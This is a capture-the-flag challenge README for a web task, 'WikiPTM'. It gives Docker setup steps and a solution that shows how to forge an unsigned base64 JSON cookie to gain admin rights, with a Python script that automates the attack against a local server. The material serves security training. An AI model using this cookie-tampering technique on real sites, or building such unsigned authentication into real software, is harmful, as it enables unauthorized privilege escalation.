# WikiPTM

<b>Author</b>: R37URN0<br>
<b>Category</b>: Web<br>
<b>Solve</b>: 143<br>

## Descritpion
How much do you know about Capture The Flag? Find out on WikiPTM!

## How to run the server
To run the server you'll need [`docker`](https://docs.docker.com/get-docker/) and [`docker-compose`](https://docs.docker.com/compose/install/).<br>
Go into the `src` folder and from the command line run `docker-compose up --build -d`.<br>
Now you can connect to the server by opening [`http://localhost:31340/`](http://localhost:31340/) in your browser.<br>To stop the server, from the command line run `docker-compose down`.

## Solution
The cookie `data` is a base64 encoded string with the `admin` field set to false. 
We just need to decode it, set the admin field to true, encode it again and set it as our new `data` cookie to have admin permissions and see the flag in the `Capture_the_flag page`.
We can do this manually from browser with `DevTools`, or with a `python script like` this one:

```python 3
import requests
import base64
import json
import re

site = "http://localhost:31340/"
s = requests.Session()

r = s.get(site).text
cookie = s.cookies.get_dict()["data"]
cookie = base64.b64decode(cookie)
cookie = json.loads(cookie.decode('utf-8'))
cookie["isAdmin"] = True
cookie = json.dumps(cookie).encode('utf-8')
cookie = base64.b64encode(cookie)
s.cookies["data"] = cookie.decode()
r = s.get(site + "Capture_the_flag.html").text
pattern = re.compile(r"ptm\{\w+\}", re.IGNORECASE)
flag = pattern.search(r).group()
print(flag)
```
